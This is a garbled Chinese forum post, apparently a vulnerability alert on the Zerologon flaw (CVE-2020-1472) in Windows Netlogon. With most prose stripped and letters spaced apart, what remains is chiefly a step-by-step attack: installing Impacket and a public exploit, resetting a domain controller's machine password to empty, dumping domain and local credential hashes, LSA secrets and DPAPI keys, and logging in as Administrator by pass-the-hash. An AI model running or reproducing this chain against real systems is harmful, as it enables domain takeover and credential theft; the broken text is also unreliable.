[28584] 2020-09-15_【漏洞预警】(CVE-2020-1472)被黑客广泛应用

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2020-09-15_【漏洞预警】(CVE-2020-1472)被黑客广泛应用 C V E - 2 0 2 0 - 1 4 7 2 广 O t s   2 0 2 0 - 0 9 - 1 5 2 0 2 0 8 1 2 N e t L o g o n C V E - 2 0 2 0 - 1 4 7 2 C V S S 1 0     2 0 2 0 9 G i t h u b P o C     M i c r o s o f t 8 1 2 N e t L o g o n C V E - 2 0 2 0 - 1 4 7 2 使 N e t L o g o n M S - N R P C 使 访 M i c r o s o f t A u g u s t W i n d o w s C V E - 2 0 2 0 - 1 4 7 2 C V E - 2 0 2 0 - 1 4 7 2 Z e r o l o g o n Z e r o l o g o n D N S Z e r o l o g o n T e r v o o r t   -   h t t p s : / / w w w . s e c u r a . c o m / b l o g / z e r o - l o g o n N e t l o g o n 2 0 0 0 R P C 0 . 0 4 使 A c t i v e   D i r e c t o r y A D P y t h o n   3 . 7 v i r t u a l e n v p i p   I m p a c k e t n r p c . p y /   i m p a c k e t   /   d c e r p c   /   v 5 G i t H u b i m p a c k e t n e t l o g o n 1 . I m p a c k e t 1 .   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / S e c u r e A u t h C o r p / i m p a c k e t 2 .   c d   i m p a c k e t
3 .   2 . Z e r o l o g o n 1 .   D C D C D C D C N e t B I O S I P I m p a c k e t 使 h a s h   N T D S . D I T N T L M K e r b e r o s p w d ~ / i m p a c k e t / 4 .   v i r t u a l e n v   - - p y t h o n = p y t h o n 3   i m p a c k e t 5 .   s o u r c e   i m p a c k e t / b i n / a c t i v a t e 6 .   p i p   i n s t a l l   - - u p g r a d e   p i p 7 .   p i p   i n s t a l l   . ~ / i m p a c k e t / 2 .   c d   e x a m p l e 3 .   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / V o i d S e c / C V E - 2 0 2 0 - 1 4 7 2 4 .   c d   C V E - 2 0 2 0 - 1 4 7 2 5 .   p i p   i n s t a l l   - r   r e q u i r e m e n t s . t x t S T A T U S _ I N V A L I D _ C O M P U T E R _ N A M E E X A M P L E - D C 1 . 2 . 3 . 4 . / c v e - 2 0 2 0 - 1 4 7 2 - e x p l o i t . p y   - n   E X A M P L E - D C   - t   1 . 2 . 3 . 4 s e c r e t s d u m p . p y   - n o - p a s s   - j u s t - d c   D o m a i n / ' D C _ N E T B I O S _ N A M E $ ' @ D C _ I P _ A D D R - h a s h e s   : 3 1 d 6 c f e 0 d 1 6 a e 9 3 1 b 7 3 c 5 9 d 7 e 0 c 0 8 9 c 0
使 使 D C D o m a i n   A d m i n 使 s e c r e t s d u m p D C >   c v e - 2 0 2 0 - 1 4 7 2 - e x p l o i t . p y   - n   W I N - U 4 Q 9 L L P 6 L 2 A   - t   1 9 2 . 1 6 8 . 2 0 9 . 1 2 9 [ + ]   S u c c e s s :   Z e r o l o g o n   E x p l o i t   c o m p l e t e d !   D C ' s   a c c o u n t   p a s s w o r d   h a s   b e e n   s e t   t o   a n   e m p t y   s t r i n g . >   s e c r e t s d u m p . p y   - n o - p a s s   - j u s t - d c   a d . t e s t . c o m / W I N - U 4 Q 9 L L P 6 L 2 A $ @ 1 9 2 . 1 6 8 . 2 0 9 . 1 2 9 A d m i n i s t r a t o r : 5 0 0 : a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 2 b 5 7 6 a c b e 6 b c f d a 7 2 9 4 d 6 b d 1 8 0 4 1 b 8 f e : : : R e s t o r e : >   w m i e x e c . p y   - h a s h e s   a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 2 b 5 7 6 a c b e 6 b c f d a 7 2 9 4 d 6 b d 1 8 0 4 1 b 8 f e   a d . t e s t . c o m / A d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 9 . 1 2 9 -   r e g   s a v e   H K L M S Y S T E M   s y s t e m . s a v e -   r e g   s a v e   H K L M S A M   s a m . s a v e -   r e g   s a v e   H K L M S E C U R I T Y   s e c u r i t y . s a v e -   g e t   s y s t e m . s a v e -   g e t   s a m . s a v e -   g e t   s e c u r i t y . s a v e -   d e l   / f   s y s t e m . s a v e -   d e l   / f   s a m . s a v e -   d e l   / f   s e c u r i t y . s a v e >   s e c r e t s d u m p . p y   - s a m   s a m . s a v e   - s y s t e m   s y s t e m . s a v e   - s e c u r i t y   s e c u r i t y . s a v e   L O C A L [ * ]   T a r g e t   s y s t e m   b o o t K e y :   0 x 3 1 f 9 9 e e 2 e 7 5 0 2 7 4 d 1 f e e 9 3 0 a b 8 8 f e 1 2 6 [ * ]   D u m p i n g   l o c a l   S A M   h a s h e s   ( u i d : r i d : l m h a s h : n t h a s h ) A d m i n i s t r a t o r : 5 0 0 : a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 2 b 5 7 6 a c b e 6 b c f d a 7 2 9 4 d 6 b d 1 8 0 4 1 b 8 f e : : : G u e s t : 5 0 1 : a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 3 1 d 6 c f e 0 d 1 6 a e 9 3 1 b 7 3 c 5 9 d 7 e 0 c 0 8 9 c 0 : : : D e f a u l t A c c o u n t : 5 0 3 : a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 3 1 d 6 c f e 0 d 1 6 a e 9 3 1 b 7 3 c 5 9 d 7 e 0 c 0 8 9 c 0 : : : [ - ]   S A M   h a s h e s   e x t r a c t i o n   f o r   u s e r   W D A G U t i l i t y A c c o u n t   f a i l e d .   T h e   a c c o u n t   d o e s n ' t   h a v e   h a s h   i n f o r m a t i o n . [ * ]   D u m p i n g   c a c h e d   d o m a i n   l o g o n   i n f o r m a t i o n   ( d o m a i n / u s e r n a m e : h a s h ) [ * ]   D u m p i n g   L S A   S e c r e t s [ * ]   $ M A C H I N E . A C C $ M A C H I N E . A C C : p l a i n _ p a s s w o r d _ h e x : e f 4 6 4 f 4 1 9 4 d 9 f 4 0 1 a f 4 1 c 9 9 8 2 d c 7 c 8 5 5 2 4 c c 9 e d 8 a d e f 4 f e 2 4 c 8 0 4 4 d 1 3 f 1 a e 4 1 c 5 9 4 1 3 1 d 2 d 4 6 c a b 3 a 0 d 3 3 8 4 c d a 9 4 b a a e 6 5 d 5 a 8 7 d 2 6 d f 1 2 0 1 f f 6 f f 1 6 9 7 6 7 2 a c 4 e 1 6 c 1 6 f 0 e 5 1 4 f 6 e 5 4 d 8 4 3 4 2 c 5 a f 4 1 9 3 f e 9 6 3 2 9 e 3 a 3 0 f b 8 4 c 0 8 8 4 5 e 7 a 8 6 d a c 4 2 9 5 2 7 6 c 7 c 2 e 3 1 8 1 5 5 5 f a 5 e e f 2 1 d 4 d 1 f 4 6 9 5 5 0 f 4 7 0 6 3 8 3 3 2 7 b 2 9 9 2 8 3 f 7 2 b 7 d f 6 b 6 6 1 c f b 1 1 1 8 9 b d 8 b 3 a b 5 5 2 f f b 9 9 a a 1 2 f f e 1 9 b 7 6 0 e 0 0 e 1 4 3 e f 3 e 7 7 6 d 8 3 7 7 d a 5 7 9 2 5 c 5 e d 7 1 a a 9 f 0 9 9 1 a c f f 7 f c 9 c 9 6 3 a d d b 8 4 9 6 f d d 2 7 3 f 2 3 1 e 1 5 a 5 1 d 9 9 f 4 1 a 7 7 0 d e 7 1 4 5 7 3 b 2 6 7 9 5 c 4 5 a 0 3 e a c 8 0 e 3 b b 4 5 a c 5 c 1 0 0 7 4 0 d a 5 8 1 4 c 3 9 7 9 e 5 3 4 9 e 8 4 7 1 6 2 3 0 8 6 c 8 0 f 6 1 6 0 1 6 3 f 4 b d 5 6 d a 3 b 7 5 a 6 d e b 1 7 b 1 0 2 0 $ M A C H I N E . A C C :   a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 9 b 5 c c b 9 7 0 0 e 3 e d 7 2 3 d f 0 8 1 3 2 3 5 7 f f 6 a 1 [ * ]   D P A P I _ S Y S T E M d p a p i _ m a c h i n e k e y : 0 x a f 8 3 4 0 6 b 2 6 1 1 f 1 8 a c 9 9 3 2 9 0 7 9 e 9 f 4 7 d 9 4 0 9 e 8 8 5 f d p a p i _ u s e r k e y : 0 x 5 3 e d 5 5 5 f 1 1 c 1 1 0 f 9 1 8 f c 9 a 9 7 a 6 c 3 5 7 6 2 6 6 9 3 0 f b 7 [ * ]   N L $ K M   0 0 0 0       5 5   A 7   D F   D F   2 7   E 2   6 4   C 1     F 7   4 2   F 2   1 B   9 6   7 6   0 1   4 F       U . . . ' . d . . B . . . v . O   0 0 1 0       2 4   4 C   5 D   9 B   2 0   E 3   E A   9 5     D D   E 9   6 1   0 F   0 0   8 E   B 2   5 1       $ L ] .   . . . . . a . . . . Q   0 0 2 0       B 1   7 9   3 F   E 0   3 7   3 E   C B   B 2     9 5   3 1   A 6   7 4   F 3   3 5   5 4   8 A       . y ? . 7 > . . . 1 . t . 5 T .   0 0 3 0       C 1   B 6   7 0   3 D   B 3   A B   A C   C 1     7 E   8 E   9 0   7 A   7 B   4 9   3 2   4 6       . . p = . . . . ~ . . z { I 2 F N L $ K M : 5 5 a 7 d f d f 2 7 e 2 6 4 c 1 f 7 4 2 f 2 1 b 9 6 7 6 0 1 4 f 2 4 4 c 5 d 9 b 2 0 e 3 e a 9 5 d d e 9 6 1 0 f 0 0 8 e b 2 5 1 b 1 7 9 3 f e 0 3 7 3 e c b b 2 9 5 3 1 a 6 7 4 f 3 3 5 5 4 8 a c 1 b 6 7 0 3 d b 3 a b a c c 1 7 e 8 e 9 0 7 a 7 b 4 9 3 2 4 6 [ * ]   C l e a n i n g   u p . . . w m i e x e c . p y
  N T 使 h t t p s : / / g i t h u b . c o m / V o i d S e c / C V E - 2 0 2 0 - 1 4 7 2 r e g   s a v e   H K L M S Y S T E M   s y s t e m . s a v e r e g   s a v e   H K L M S A M   s a m . s a v e r e g   s a v e   H K L M S E C U R I T Y   s e c u r i t y . s a v e g e t   s y s t e m . s a v e g e t   s a m . s a v e g e t   s e c u r i t y . s a v e d e l   / f   s y s t e m . s a v e d e l   / f   s a m . s a v e d e l   / f   s e c u r i t y . s a v e s e c r e t s d u m p . p y   - s a m   s a m . s a v e   - s y s t e m   s y s t e m . s a v e   - s e c u r i t y   s e c u r i t y . s a v e   L O C A L r e i n s t a l l _ o r i g i n a l _ p w . p y
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则